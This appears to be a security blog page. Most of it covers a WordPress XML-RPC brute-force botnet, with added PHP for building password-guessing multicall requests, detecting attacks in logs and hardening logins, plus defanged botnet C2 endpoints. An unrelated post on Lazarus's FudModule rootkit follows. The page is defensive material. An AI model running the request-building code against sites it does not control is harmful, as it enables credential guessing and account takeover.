Categories
Coding Hacking Security

WordPress Password-Cracking Botnet: What to Know

Since 2018, password-cracking botnets have been targeting WordPress sites. These botnets are made of infected WordPress sites that are repurposed to brute-force other WordPress sites. The threat actors use WordPress's native XML-RPC interface to test username/password pairs; the goal is to gain access to privileged accounts and then use the newly compromised site to repeat the process against other sites.

How the Botnet Works

What is a botnet?

A botnet is a network of infected machines under the control of a single operator, who uses malicious code and remote access to direct them and to spread the infection further.

Russian Origins

The botnet in question uses a group of four command and control (C2) servers that send requests to over 14,000 proxy servers provided by a Russian service, best-proxies[.]ru. Some digital footprints point to servers in Romania and the Netherlands as well.

These proxy servers anonymize the C2 traffic. The instructions are relayed to over 20,000 infected WordPress sites, each running an attack script. The script attacks targeted WordPress sites by attempting XML-RPC authentication against privileged accounts.

// Fragment of the attack script: build one XML-RPC request that carries
// every password in the list for the given login. The helpers
// createRequestXML() and addElementXML() are not shown on this page.
function createFullRequest($login, $passwords){
    $xml = createRequestXML();                              // base methodCall document
    for($i = 0; $i < count($passwords); $i++){
        $xml = addElementXML($xml, $login, $passwords[$i]); // one sub-call per password
    }
    $request = $xml->saveXML();
    return $request;
}

The script generates passwords from publicly known credential patterns and then applies those patterns in its brute-force attempts. For instance, if the script is trying to log on to example.com as the user Alice, it will try passwords such as Alice1, Alice2018, and so on. This tactic is very effective at scale: only a small fraction of users on any one site fit the pattern, but across a large number of targets that fraction adds up.

The instructions the C2 system issues to the script can optionally define $startPass and $endPass variables, which tell the script to attempt only a subset of the password list rather than the whole set. Splitting the list this way lets many infected sites work on the same target in parallel, which greatly increases the speed at which the whole system operates.
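The following added example, which is not the botnet's script and not code from this page, shows the mechanics in PHP: it derives candidates from a username in the style described above, takes the [startPass, endPass) shard a C2 would hand out, packs the shard into one XML-RPC body, and, from the defender's side, counts how many credential guesses such a body carries. The packing uses system.multicall around wp.getUsersBlogs, the standard WordPress XML-RPC method that takes a username and password; the username "Alice", the year and the suffix list are illustrative assumptions. Send such a request only at sites you own.

```php
<?php
// Added example (not the botnet's code). Assumed inputs: login "Alice",
// year 2018, and a short suffix list standing in for the real pattern set.

/** Candidates in the style the page describes: Alice, Alice1, Alice2018 ... */
function candidatePasswords(string $login, int $year): array
{
    $name = ucfirst(strtolower($login));
    $out = [];
    foreach ([$name, strtolower($name)] as $base) {
        foreach (['', '1', '12', '123', (string) $year, '!'] as $suffix) {
            $out[] = $base . $suffix;
        }
    }
    return array_values(array_unique($out));
}

/** Shard [startPass, endPass) of the list, as the C2's optional variables select. */
function shardPasswords(array $passwords, int $startPass, int $endPass): array
{
    $endPass = min($endPass, count($passwords));
    if ($startPass < 0 || $startPass >= $endPass) {
        return [];
    }
    return array_slice($passwords, $startPass, $endPass - $startPass);
}

/** Escape one XML-RPC string value. */
function xmlStringValue(string $s): string
{
    return '<value><string>' . htmlspecialchars($s, ENT_XML1 | ENT_QUOTES, 'UTF-8') . '</string></value>';
}

/** One POST body carrying one wp.getUsersBlogs call per password. */
function buildMulticallBody(string $login, array $passwords): string
{
    $calls = '';
    foreach ($passwords as $password) {
        $calls .= '<value><struct>'
            . '<member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member>'
            . '<member><name>params</name><value><array><data>'
            . xmlStringValue($login) . xmlStringValue($password)
            . '</data></array></value></member>'
            . '</struct></value>';
    }
    return '<?xml version="1.0"?><methodCall><methodName>system.multicall</methodName>'
        . '<params><param><value><array><data>' . $calls . '</data></array></value></param></params>'
        . '</methodCall>';
}

/** Defender's view: how many sub-calls does a request body contain? */
function countMulticallEntries(string $body): int
{
    $doc = new DOMDocument();
    if (!@$doc->loadXML($body, LIBXML_NONET)) {   // LIBXML_NONET: never fetch external resources
        return 0;
    }
    $xp = new DOMXPath($doc);
    $nodes = $xp->query('/methodCall[methodName="system.multicall"]/params/param/value/array/data/value');
    return $nodes === false ? 0 : $nodes->length;
}

$all   = candidatePasswords('Alice', 2018);
$shard = shardPasswords($all, 3, 9);
$body  = buildMulticallBody('Alice', $shard);
printf("%d candidates, shard of %d, %d guesses in one request\n",
    count($all), count($shard), countMulticallEntries($body));
```

The point for defenders is the last function: a single HTTP request to xmlrpc.php can carry hundreds of credential guesses, so per-request rate limits on wp-login.php alone do not see this traffic, and a WAF rule that rejects multicall bodies above a small entry count is a cheap control.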

Similar Attacks

As recently as February 2024, similar attacks have been seen injecting malicious JavaScript into WordPress sites without the owners' knowledge, so that each visitor's browser silently does the brute-forcing in the background. The injected script fetches a task, a target site with a user name and a list of passwords, from a getTask endpoint, tries those credentials against the target, and reports the outcome to a completeTask endpoint; the attackers are thus handed working credentials, and the cycle continues on other sites, in a never-ending loop of credential requests and results.

const getTaskUrl = 'hxxps://dynamic-linx[.]com/getTask.php';

const completeTaskUrl = 'hxxps://dynamic-linx[.]com/completeTask.php';

It is not yet known where this modern take on the botnet originates, but the botnet is already quite large, amassing a list of approximately 1,200 affected IPs in just under four days. Security specialists are working toward a solution.

Learn more about this from Ars Technica.

How Do You Know?

It's generally no small task to determine whether you've been infected, much less the source of the infection, since malware is designed to hide itself. The first place to look, for WordPress, is your web server's access and error logs: /var/log/apache2 or /var/log/httpd for Apache, /var/log/nginx for Nginx, and C:\inetpub\logs\LogFiles for IIS. Look for bursts of POST requests to xmlrpc.php and wp-login.php from a single address; note that xmlrpc.php answers a failed login with HTTP 200 and a fault in the body, so the status code alone does not separate failures from successes.

Additionally, check your installation's wp-admin, wp-content and wp-includes directories for recently modified or unexpected files; wp-content/uploads, wp-content/plugins and wp-content/themes are the usual places for injected code.
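As an added example, not part of the original page, the PHP script below runs the log check described above over a handful of constructed access-log lines in the Apache/Nginx "combined" format. It flags any source address that sends at least a threshold number of POSTs to xmlrpc.php or wp-login.php inside a sliding window; the addresses, timestamps and user agents are made up.

```php
<?php
// Added example: detect login-hammering sources in web server access logs.
// SAMPLE_LOG is constructed for this example, not taken from a real server.

const SAMPLE_LOG = <<<'LOG'
203.0.113.5 - - [10/Dec/2018:14:03:11 +0000] "POST /xmlrpc.php HTTP/1.1" 200 1745 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Dec/2018:14:03:12 +0000] "POST /xmlrpc.php HTTP/1.1" 200 1745 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Dec/2018:14:03:13 +0000] "GET /index.php HTTP/1.1" 200 8120 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Dec/2018:14:03:14 +0000] "POST /xmlrpc.php HTTP/1.1" 200 1745 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Dec/2018:14:03:20 +0000] "POST /wp-login.php HTTP/1.1" 200 3310 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Dec/2018:14:03:21 +0000] "POST /xmlrpc.php HTTP/1.1" 200 1745 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Dec/2018:14:03:25 +0000] "POST /wp-login.php?redirect_to=%2Fwp-admin%2F HTTP/1.1" 200 3310 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Dec/2018:14:03:30 +0000] "POST /xmlrpc.php HTTP/1.1" 200 1745 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Dec/2018:14:09:41 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
LOG;

/** Parse one combined-format line into ip, unix time, method, path and status. */
function parseLine(string $line): ?array
{
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) (\S+)/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    $ts = DateTime::createFromFormat('d/M/Y:H:i:s O', $m[2]);
    if ($ts === false) {
        return null;
    }
    return [
        'ip'     => $m[1],
        'time'   => $ts->getTimestamp(),
        'method' => $m[3],
        'path'   => explode('?', $m[4], 2)[0],   // drop the query string
        'status' => (int) $m[5],
    ];
}

/**
 * Return [ip => peak count] for addresses with at least $threshold login POSTs
 * inside any $windowSeconds-wide window. Status codes are ignored on purpose:
 * xmlrpc.php returns 200 for failed logins too.
 */
function findBruteForcers(string $log, int $threshold = 5, int $windowSeconds = 60): array
{
    $loginPaths = ['/xmlrpc.php', '/wp-login.php'];
    $hits = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        $e = parseLine($line);
        if ($e === null || $e['method'] !== 'POST' || !in_array($e['path'], $loginPaths, true)) {
            continue;
        }
        $hits[$e['ip']][] = $e['time'];
    }

    $flagged = [];
    foreach ($hits as $ip => $times) {
        sort($times);
        $start = 0;
        for ($i = 0, $n = count($times); $i < $n; $i++) {
            while ($times[$i] - $times[$start] > $windowSeconds) {   // slide the window forward
                $start++;
            }
            $inWindow = $i - $start + 1;
            if ($inWindow >= $threshold) {
                $flagged[$ip] = max($flagged[$ip] ?? 0, $inWindow);
            }
        }
    }
    return $flagged;
}

foreach (findBruteForcers(SAMPLE_LOG) as $ip => $count) {
    echo "$ip: $count login POSTs within 60s\n";
}
```

With the constructed lines, only 203.0.113.5 is reported (seven login POSTs in under a minute); 198.51.100.7 sends two requests six minutes apart and stays under the threshold. Remember that one xmlrpc.php POST may hold hundreds of guesses via system.multicall, so a low threshold is appropriate for that path, and that IIS writes W3C-format logs that need a different parser.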

How to Protect Your WordPress Site

To protect your WordPress site from this type of attack, it’s important to take the following steps:

  1. Use strong, unique passwords: Make sure that you are using strong, unique passwords for all of your WordPress accounts; this makes it far harder for attackers to guess their way in, and it defeats the username-derived patterns described above. Additionally, consider requiring two-factor authentication for your users' logins.
  2. Limit login attempts: Consider using a plugin to limit the number of login attempts that can be made against your site; this helps to blunt brute-force attacks. Many of these plugins offer further customization beyond a bare attempt limit, such as lockout periods and IP blocklisting. Make sure the limit covers XML-RPC logins and not just wp-login.php.
  3. Remove unused user accounts: If you are no longer using an account, or you believe an account may be compromised, it's safest to remove the account entirely, as you can always recreate it later. In addition, once your site is fully set up, consider removing or renaming the default "admin" user, as this is the first account name attackers try.
  4. Keep your WordPress site up to date: Make sure that you are running the latest version of WordPress and that all of your plugins and themes are up to date. By updating on a consistent schedule, you ensure your system gets the security patches and bug fixes that ship with each release.
  5. Use a security plugin: Consider using a security plugin to help protect your site. There are many free and paid options available that can help to prevent brute-force attacks and provide other security features, such as custom reports and notifications.

We recommend the free plugin Loginizer, which includes brute-force protection and alerting on failed login attempts.
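If you would rather not add a plugin for steps 2 and 5, the must-use plugin below is an added example (not Loginizer's code and not from the original page) of the same two controls in plain WordPress hooks: it removes system.multicall so one XML-RPC request cannot carry a whole password shard, and it throttles failed logins per source address using transients. Drop it in wp-content/mu-plugins/ and it loads automatically. The thresholds, the transient key prefix and the clientIp() helper are assumptions; adjust them for your site.

```php
<?php
/**
 * Plugin Name: Harden XML-RPC and throttle failed logins (added example)
 * Description: Removes system.multicall, limits failed logins per client address.
 */

// Option A: turn off all XML-RPC methods that need authentication. This is the
// strongest setting, but it breaks Jetpack, the mobile apps and remote publishing.
// add_filter('xmlrpc_enabled', '__return_false');

// Option B: keep XML-RPC, but remove the method that bundles many logins into
// one request, and the pingback method that is abused for DDoS.
add_filter('xmlrpc_methods', function (array $methods): array {
    unset($methods['system.multicall'], $methods['pingback.ping']);
    return $methods;
});

// Assumed helper: the client address. Behind a reverse proxy REMOTE_ADDR is the
// proxy, so configure the server to restore the real address before trusting this.
function hardening_example_client_ip(): string
{
    return $_SERVER['REMOTE_ADDR'] ?? '0.0.0.0';
}

const HARDENING_EXAMPLE_MAX_FAILURES = 5;                       // assumption
const HARDENING_EXAMPLE_LOCKOUT      = 15 * MINUTE_IN_SECONDS;  // assumption

function hardening_example_key(): string
{
    return 'hx_failed_' . md5(hardening_example_client_ip());
}

// wp_authenticate() fires this for wp-login.php and for xmlrpc.php logins alike,
// so XML-RPC guesses count against the same limit.
add_action('wp_login_failed', function ($username): void {
    $key   = hardening_example_key();
    $count = (int) get_transient($key);
    set_transient($key, $count + 1, HARDENING_EXAMPLE_LOCKOUT);
});

// Priority 30 runs after core's username/password check (priority 20); returning
// a WP_Error here rejects the login even if the password was right.
add_filter('authenticate', function ($user, $username, $password) {
    if ((int) get_transient(hardening_example_key()) >= HARDENING_EXAMPLE_MAX_FAILURES) {
        return new WP_Error(
            'too_many_attempts',
            __('Too many failed login attempts from your address. Try again later.')
        );
    }
    return $user;
}, 30, 3);

// Clear the counter on a successful login so legitimate users are not locked out.
add_action('wp_login', function ($user_login, $user): void {
    delete_transient(hardening_example_key());
}, 10, 2);
```

Transients live in the options table (or the object cache if one is configured), so the lockout is shared by all PHP workers of the site. This throttles per source address; a distributed botnet of 20,000 sites each sending a few guesses will still get through, which is why strong passwords and two-factor authentication (step 1) remain the primary control and this is a secondary one.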

Conclusion

The recent WordPress password-cracking botnet is a serious threat to WordPress sites, but it is only the tip of the security iceberg. As more and more machines become infected through seemingly "normal" websites, malware can travel stealthily behind the scenes. By taking proper precautions, you can protect yourself from this type of attack, as well as countless others.


Lazarus Group Exploits Windows Zero-Day for Privilege Escalation with FudModule Rootkit

1. Lazarus

The Lazarus Group, a North Korean collective known for sabotaging computer systems, has recently been exploiting a Windows kernel privilege escalation vulnerability (CVE-2024-21338) as a zero-day. The vulnerability is in appid.sys, the core driver of AppLocker, Microsoft's application allow-listing feature; it earned a CVSS score of 7.8 out of 10.

Lazarus exploits the vulnerability with the FudModule rootkit, a data-only rootkit: it executes no code of its own in the kernel, but uses a kernel read/write primitive obtained through a driver to rewrite kernel data structures. The ultimate goal is to bypass Windows security mechanisms.

In earlier iterations, the attackers obtained that read/write primitive by exploiting known vulnerabilities in third-party drivers that they brought along themselves. Exploiting a driver that ships with Windows removes the need to load one. The updated FudModule rootkit also adds a handle table entry manipulation technique that suspends PPL (Protected Process Light) protected processes.

The affected AV products include, but are not limited to, Microsoft Defender, CrowdStrike Falcon, and HitmanPro.

2. FudModule

The FudModule rootkit itself is a frighteningly versatile piece of malware; it leverages kernel-level read/write access to disable the features that security products rely on to detect suspicious behavior. These include registry callbacks, object callbacks, and process, thread, and image kernel callbacks.

It is also capable of removing the file system minifilters that AV products use to monitor file operations.

Security products depend on those same callbacks and minifilters to spot and block known-vulnerable drivers being loaded. Keep in mind that updating a vulnerable driver does not necessarily remove the old versions from the system, so those weak spots can remain open to attack.

A further rootkit behavior targets specific AV products outright, as mentioned earlier, leaving their protections bypassed and non-functional.

3. Summary

The Lazarus Group is one of the most well-known and persistent threats in cybersecurity. The FudModule rootkit is only the most recent display of their technical prowess.

It is important for organizations to stay vigilant about their security; this includes taking proper precautions, addressing potential leaks and weaknesses in infrastructure, and regularly applying updates, in this case the Windows update that patches CVE-2024-21338. Additionally, having monitoring in place will help spot suspicious behavior before anything malicious completes.

Staying educated, up to date, and aware will serve your system’s security in the long-term.